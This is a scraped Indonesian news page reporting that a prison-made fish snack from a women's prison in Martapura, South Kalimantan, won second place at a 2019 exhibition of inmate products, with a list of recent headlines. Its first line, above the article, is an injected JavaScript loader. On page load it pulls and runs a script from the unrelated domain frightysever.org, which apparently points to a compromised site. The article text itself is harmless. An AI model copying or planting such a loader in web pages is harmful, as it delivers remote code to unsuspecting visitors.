(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Hukum

Amplang LPP Martapura Terbaik Kedua Produk Unggulan Narapidana 2019


BANJARMASIN, Produk amplang Ikan Warna Permata warga binaan Lembaga Pemasyarakatan Perempuan (LPP) Klas IIA Martapura terbaik kedua produk pangan pameran Produk Unggulan Narapidana (PUN) tahun 2019.

Pameran berlangsung selama 5 hari, dari tanggal 25-29 Maret 2019 digelar Kementerian Hukum HAM RI melalui Direktorat Jenderal Pemasyarakatan di Kementerian Perindustrian, Jakarta, mengusung tema “Produktivitas Berkualitas Untuk Indonesia Berkelas”.

Kanwil Kemenkum HAM Kalsel membawa produk pangan dari LPP Martapura berupa amplang, saluang crispy, dan abon haruan. Produk tersebut habis dibeli pengunjung pameran, begitu juga dengan kerajinan tangan sasirangan serta souvenir lainnya menarik perhatian pengunjung.

Puncak pameran PUN tahun 2019 ini ditutup dengan pengumuman pemberian piagam penghargaan dan uang pembinaan kepada Divisi Pemasyarakatan yang berhak meraih predikat terbaik dalam masing-masing katagori terkait penilaian lomba, produk, dan pameran.

Produk amplang Ikan Warna Permata dari LPP Klas IIA Martapura diumumkan sebagai terbaik kedua produk pangan pameran Produk Unggulan Narapidana (PUN) tahun 2019. Piagam penghargaan dan uang pembinaan diserahkan langsung oleh Direktur Jendral Pemasyarakatan, Dr Sri Puguh Budi Utami kepada Yunengsih, Kalapas Perempuan Martapura.

Terbaik pertama kategori produk pangan PUN diraih warga binaan Lapas Maluku dengan produk teh Celup Melon.

Dirjen Lapas Dr Sri Puguh Budi Utami menginginkan, agar pembinaan di Lapas dan Rutan terus dikembangkan. “Tidak ada kata tidak bisa apabila kita mau. Semakin hari Lembaga Pemasyarakatan harus semakin baik dalam memberikan pembinaan yang berkualitas dan produktif. Jangan pernah berhenti belajar, tuntutan semakin tinggi, ubah mindset, kembangkam perilaku positif,” ujarnya.

Kepala Divisi Pemasyarakatan Kemnkum HAM Kalsel, Alfi Zahrin Kiemas yang turut berhadir, merasa bangga dan bersyukur atas prestasi yang telah diraih. “Ini sebagai pemicu untuk kita semua, khususnya UPT Pemasyarakatan di Kalimantan Selatan agar dapat meningkatkan peran pembinaan warga binaan,” ujarnya.

Kepala LPP Klas 2 Martapura, Yunengsih menuturkan, penghargaan ini juga tidak luput dari usaha dan kerja keras bersama seluruh petugas LPP Martapura menjadi yang terbaik dalam memberikan pelayanan kepada warga binaan.

Sekadar diketahui, pameran produk unggulan narapidana, merupakan agenda tahunan Kementerian Hukum dan HAM RI melalui Direktorat Jenderal Pemasyarakatan, diharapkan akan ada peningkatan-peningkatan produktifitas dari lembaga pemasyarakatan seluruh Indonesia. (rico)

Reporter:Rico
Editor:Bie

Desy Arfianty

Recent Posts

13 Februari Hari Persatuan Ahli Farmasi Indonesia: Ini Sejarahnya

KANALKALIMANTAN.COM - Insan farmasi di Indonesia setiap tanggal 13 Februari memperingati Hari Persatuan Ahli Farmasi… Read More

2 jam ago

BI Kalsel Selenggarakan SERAMBI 2026, Dukung Kebutuhan Uang Kartal Periode Ramadan dan Idulfitri

KANALKALIMANTAN.COM, BANJARMASIN – Kantor Perwakilan (KPw) Bank Indonesia (BI) Provinsi Kalimantan Selatan menggelar kick off… Read More

3 jam ago

KPK Dalami Hubungan Jabatan Kepala KPP Madya Banjarmasin di 12 Perusahaan

KANALKALIMANTAN.COM, JAKARTA - Komisi Pemberantasan Korupsi (KPK) sedang mendalami hubungan antara jabatan direksi yang dimiliki… Read More

11 jam ago

Gubernur Muhidin Ingatkan Dana Transfer Pusat Dimanfaatkan Optimal

KANALKALIMANTAN.COM, BANJARMASIN – Gubernur Kalimantan Selatan (Kalsel) H Muhidin meminta langkah strategis untuk memastikan dana… Read More

12 jam ago

Upaya Mencegah Perkawinan Usia Anak di Balangan

KANALKALIMANTAN.COM, PARINGIN - Upaya mencegah perkawinan usia anak, Dinas Pemberdayaan Perempuan, Perlindungan Anak, Pengendalian Penduduk,… Read More

13 jam ago

Wabup Dodo: Hasil Reses DPRD Jadi Acuan Kebijakan

KANALKALIMANTAN.COM, KUALA KAPUAS - Wakil Bupati (Wabup) Kapuas Dodo menegaskan berbagai aspirasi maupun usulan yang… Read More

13 jam ago

This website uses cookies.